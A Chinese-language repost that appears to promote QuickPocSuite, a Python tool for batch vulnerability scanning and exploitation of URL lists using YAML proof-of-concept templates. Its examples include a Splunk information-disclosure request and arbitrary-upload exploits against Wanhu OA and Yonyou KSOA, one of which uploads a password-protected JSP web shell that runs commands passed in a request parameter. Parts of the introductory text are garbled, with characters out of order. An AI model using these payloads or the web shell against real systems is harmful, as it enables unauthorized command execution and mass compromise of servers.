工具介绍
追梦信安@W01fh4cker师傅新造的一个轮子,适利合用简的单漏洞的批量扫描,例只如需要在url后面拼接一个payload,然根后据返包回判断关键字是存否在这种。
关注【Hack分享吧】公众号,回复关键字【230514】获取下载链接
对应的yaml格式的poc文件编写起非来常简单,适快合速利用。
详细参数:
usage: QuickPocSuite.py [-h] [-y YAML] [-l LIST] [-t THREAD] [-o OUTPUT]
QuickPocSuite v0.0.2 By:W01fh4cker
optional arguments:
-h, --help show this help message and exit
-y YAML, --yaml YAML the YAML file containing the PoC
-l LIST, --list LIST the file containing target URLs
-t THREAD, --thread THREAD
the maximum time in seconds for each request,default: 20
-o OUTPUT, --output OUTPUT
the file to output the results, default: output.txt
使用方法
git clone https://github.com/W01fh4cker/QuickPocSuite.git
cd QuickPocSuite
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
python QuickPocSuite.py -y <yaml文件地址> -l <需要批量利用的url文件>
# 例如:python QuickPocSuite.py -y splunk-info-disclosure.yaml -l urls.txt
yaml编写方法
适用版本:0.0.2,编写教程:
# 单次GET
author: W01fh4cker
request:
-
method: GET
payload: /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
# 自定义请求头,如果不填,则默认设置请求头只包含ua
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
keyword: licenseKeys
status: 200
# 单次post,以<万户OA smartUpload.jsp 任意文件上传漏洞>为例
author: W01fh4cker
request:
-
method: POST
payload: /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynNQ8hoU56tfSwBVU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=PjXnh6bLTzy0ygQf41vWctGPLGkSvkJ6J1yS3ppzJmCvVFQZgm1r!1156443419
Connection: close
data: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"photo\"; filename=\"shell.jsp\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"continueUpload\"\r\n\
\r\n\
1\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"submit\"\r\n\
\r\n\
上传继续\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
status: 200
# 单次post+单次get,以<用友-时空KSOA ImageUpload 任意文件上传漏洞>为例
author: W01fh4cker
request:
-
method: POST
payload: /servlet/com.sksoft.bill.ImageUpload?filename=188888.txt&filepath=/
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: "*/*"
Accept-Encoding: gzip, deflate
Connection: close
data: 123456789
status: 200
-
method: GET
payload: /pictures/188888.txt
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
keyword: 123456789
status: 200
payload为需要在url后面拼接的内容;keyword为存在漏洞的url的界面中出现的关键字。例如:
Todo-list
和fofa/hunter/shodan/zoomeye/quake等网络测绘引擎的联动;
自动对完成扫描的IP进行分析,例如反查域名/ASN/org等;
开发poc仓库,添加更多的poc;
……(你们定,直接提issues,合理的都会满足)